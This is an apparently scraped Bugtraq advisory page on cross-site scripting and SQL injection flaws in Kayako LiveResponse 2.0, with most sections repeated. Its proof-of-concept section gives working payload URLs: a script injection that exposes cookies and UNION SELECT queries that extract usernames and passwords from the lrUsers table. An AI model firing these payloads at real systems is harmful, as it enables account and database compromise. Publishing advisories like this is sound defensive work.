Kayako LiveResponse Multiple Input Validation Vulnerabilities
BID:14425
Info
Kayako LiveResponse Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 14425 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 30 2005 12:00AM |
| Updated: | Jul 30 2005 12:00AM |
| Credit: | Discovery is credited to James Bercegay of the GulfTech Security Research Team. |
| Vulnerable: |
Kayako LiveResponse 2.0 |
| Not Vulnerable: | |
Discussion
Kayako LiveResponse Multiple Input Validation Vulnerabilities
Kayako LiveResponse is prone to multiple cross-site scripting, SQL injection, and HTML injection vulnerabilties. These issues are all related to input validation errors.
The cross-site scripting and HTML injection vulnerabilities may allow for theft of cookie-based authentication credentials or other attacks. The SQL injection vulnerabilities may permit a remote attacker to compromise the software or launch attacks other attacks against the database.
Kayako LiveResponse is prone to multiple cross-site scripting, SQL injection, and HTML injection vulnerabilties. These issues are all related to input validation errors.
The cross-site scripting and HTML injection vulnerabilities may allow for theft of cookie-based authentication credentials or other attacks. The SQL injection vulnerabilities may permit a remote attacker to compromise the software or launch attacks other attacks against the database.
Exploit / POC
Kayako LiveResponse Multiple Input Validation Vulnerabilities
There is no exploit required. The following examples were submitted:
Cross-site scripting:
http://www.example.com/index.php?username="><script>alert(document.cookie)</script>
SQL injection:
http://www.example.com/index.php?date=22&month=3&year=2005%20UNION%20SELECT%200,0,0,0,0,0,
username,pass%20FROM%20lrUsers%20WHERE%201/*&_g=2&_a=panel&_m=cal
http://www.example.com/index.php?date=22%20UNION%20SELECT%200,0,0,0,0,0,username,pass%20
FROM%20lrUsers%20WHERE%201/*&month=3&year=2005&_g=2&_a=panel&_m=cal
There is no exploit required. The following examples were submitted:
Cross-site scripting:
http://www.example.com/index.php?username="><script>alert(document.cookie)</script>
SQL injection:
http://www.example.com/index.php?date=22&month=3&year=2005%20UNION%20SELECT%200,0,0,0,0,0,
username,pass%20FROM%20lrUsers%20WHERE%201/*&_g=2&_a=panel&_m=cal
http://www.example.com/index.php?date=22%20UNION%20SELECT%200,0,0,0,0,0,username,pass%20
FROM%20lrUsers%20WHERE%201/*&month=3&year=2005&_g=2&_a=panel&_m=cal
Solution / Fix
Kayako LiveResponse Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Kayako LiveResponse Multiple Input Validation Vulnerabilities
References:
References:
- Kayako Homepage (Kayako)
- Kayako liveResponse Multiple Vulnerabilities (GulfTech Security Research
)